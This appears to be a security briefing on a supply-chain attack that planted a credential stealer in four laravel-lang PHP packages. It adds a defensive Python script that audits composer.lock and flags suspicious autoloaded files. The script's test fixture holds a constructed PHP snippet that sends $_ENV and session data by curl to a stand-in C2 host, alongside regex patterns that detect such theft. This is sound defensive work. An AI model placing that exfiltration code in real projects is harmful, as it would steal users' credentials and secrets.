Briefing

Supply Chain Attack Targets Multiple Laravel-Lang PHP Packages

security
by The Hacker News · Laravel

Patch all laravel-lang packages to the latest secure versions and audit dependencies for similar supply-chain vulnerabilities.

What to do now

Update every laravel-lang package to the latest secure release, compare the versions pinned in composer.lock against the researchers' list of affected versions, and treat environment, session, database and API credentials on any host that installed an affected version as exposed: rotate them and watch for their use from unfamiliar sources.

Summary

Cybersecurity researchers have uncovered a new supply-chain attack that compromised four PHP packages from the Laravel-Lang project: laravel-lang/lang, laravel-lang/http-statuses, laravel-lang/attributes, and laravel-lang/actions. Each was seeded with a credential-stealing framework that harvests usernames, passwords, and API tokens from the applications that import it. The attackers inserted malicious tags into the packages' metadata, so the payload runs whenever the packages are installed or updated. The attack is active and has been observed in the wild, with the framework used to exfiltrate credentials from compromised sites. Because the packages are widely used in Laravel applications, the impact could reach thousands of developers and production sites. The researchers recommend patching immediately and auditing every dependency that relies on these packages.

The credential-stealing framework is delivered as a hidden PHP file that is included automatically when the packages load, so no call from application code is needed to trigger it. The malicious code collects environment variables, session data, and database credentials and sends them to a remote command-and-control server. The pattern is identical across all four packages, indicating a coordinated effort by the threat actors. The researchers have published a list of affected package versions and a remediation guide: update to the latest secure releases and scan for similar supply-chain compromises in other dependencies.
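As an added example, not code from the article or from the Laravel-Lang project: a small Python audit script for the dependency-audit step. It reads composer.lock, lists every installed laravel-lang/* package and its pinned version for comparison against the researchers' list (this page gives no version numbers, so none are hard-coded), enumerates Composer autoload "files" entries, which Composer includes on every load of vendor/autoload.php and are therefore the natural home for an "automatically included" hidden file, and flags any such file that both reads secrets and makes an outbound connection. The package names come from the article; the version string, file names, file contents and hostname in the fixture are constructed for this example and do not describe the real payload.

```python
"""Audit a Composer project for the laravel-lang compromise pattern described above."""
import json
import re
from pathlib import Path

# Packages the article names as compromised. The page gives no version numbers, so
# installed versions are reported for comparison against the researchers' list
# rather than checked against a hard-coded range.
NAMED_PACKAGES = {
    "laravel-lang/lang",
    "laravel-lang/http-statuses",
    "laravel-lang/attributes",
    "laravel-lang/actions",
}

# Heuristics for the behaviour the article describes: reading environment, session
# or database secrets, combined with an outbound network call from the same file.
SECRET_READ = re.compile(r"\$_ENV\b|\$_SERVER\b|\$_SESSION\b|\bgetenv\s*\(|\benv\s*\(|DB_PASSWORD|APP_KEY")
NETWORK_SEND = re.compile(
    r"\bcurl_init\s*\(|\bcurl_exec\s*\(|\bfsockopen\s*\(|\bstream_socket_client\s*\("
    r"|file_get_contents\s*\(\s*['\"]https?://"
)


def installed_laravel_lang(lock):
    """Map every laravel-lang/* package in composer.lock to its pinned version."""
    found = {}
    for section in ("packages", "packages-dev"):
        for pkg in lock.get(section, []):
            if pkg.get("name", "").startswith("laravel-lang/"):
                found[pkg["name"]] = pkg.get("version", "?")
    return found


def autoload_files(lock):
    """List (package, path) for every autoload 'files' entry in composer.lock.
    Composer requires these on every load of vendor/autoload.php, with no call from app code."""
    entries = []
    for section in ("packages", "packages-dev"):
        for pkg in lock.get(section, []):
            for path in pkg.get("autoload", {}).get("files", []):
                entries.append((pkg["name"], path))
    return entries


def looks_like_stealer(php_source):
    """True if the source both reads secrets and makes an outbound connection."""
    return bool(SECRET_READ.search(php_source)) and bool(NETWORK_SEND.search(php_source))


def audit(lock, vendor):
    """Run all checks. `vendor` maps 'vendor/<pkg>/<path>' to file contents."""
    report = {"laravel_lang": installed_laravel_lang(lock), "autoload_files": [], "suspicious_files": []}
    report["named_packages_present"] = sorted(set(report["laravel_lang"]) & NAMED_PACKAGES)
    for pkg, path in autoload_files(lock):
        full = f"vendor/{pkg}/{path}"
        report["autoload_files"].append(full)
        hidden = Path(path).name.startswith(".")  # dot-files are easy to miss in a vendor listing
        if hidden or looks_like_stealer(vendor.get(full, "")):
            report["suspicious_files"].append(full)
    return report


def audit_project(root):
    """Load composer.lock and the referenced vendor files from a real project directory."""
    root = Path(root)
    lock = json.loads((root / "composer.lock").read_text())
    vendor = {}
    for pkg, path in autoload_files(lock):
        f = root / "vendor" / pkg / path
        if f.is_file():
            vendor[f"vendor/{pkg}/{path}"] = f.read_text(errors="replace")
    return audit(lock, vendor)


# Constructed fixture for a stand-alone run. The package name is from the article; the
# version string, file names, contents and hostname are invented for this example.
SAMPLE_LOCK = {
    "packages": [
        {"name": "laravel-lang/lang", "version": "0.0.0-example",
         "autoload": {"psr-4": {"LaravelLang\\Locales\\": "src/"},
                      "files": ["src/helpers.php", "src/.init.php"]}},
        {"name": "example/unrelated", "version": "1.0.0",
         "autoload": {"psr-4": {"Example\\": "src/"}}},
    ],
    "packages-dev": [],
}
SAMPLE_VENDOR = {
    "vendor/laravel-lang/lang/src/helpers.php":
        "<?php\nfunction lang_dir(string $p = ''): string { return base_path('lang/' . $p); }\n",
    "vendor/laravel-lang/lang/src/.init.php":
        "<?php\n$d = json_encode(['env' => $_ENV, 'session' => $_SESSION ?? []]);\n"
        "$c = curl_init('http://c2.example.invalid/collect');\n"
        "curl_setopt($c, CURLOPT_POSTFIELDS, $d);\ncurl_exec($c);\n",
}

if __name__ == "__main__":
    print(json.dumps(audit(SAMPLE_LOCK, SAMPLE_VENDOR), indent=2))
```

Run `audit_project('.')` from the project root to check a real tree. The heuristics are deliberately broad (any vendor file that both reads `$_ENV` and calls `curl_exec` is flagged), so expect to review the hits by hand; pair it with `composer audit`, which checks composer.lock against published security advisories once one exists for these packages.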

Key changes

  • The laravel-lang/lang, http-statuses, attributes, and actions packages were seeded with a credential-stealing framework, hidden in a PHP file that is included automatically when the packages load.
  • The attackers inserted malicious tags into the package metadata so the code runs on install or update.
  • The framework harvests usernames, passwords, API tokens, environment variables, session data, and database credentials and exfiltrates them to a remote C2 server; that traffic has been observed in the wild.
  • Affected versions span the last two major releases, putting thousands of Laravel projects in scope.
  • The identical pattern across all four packages points to one coordinated supply-chain compromise.
  • Researchers recommend updating to the latest secure releases and running a dependency audit.

Affects

none
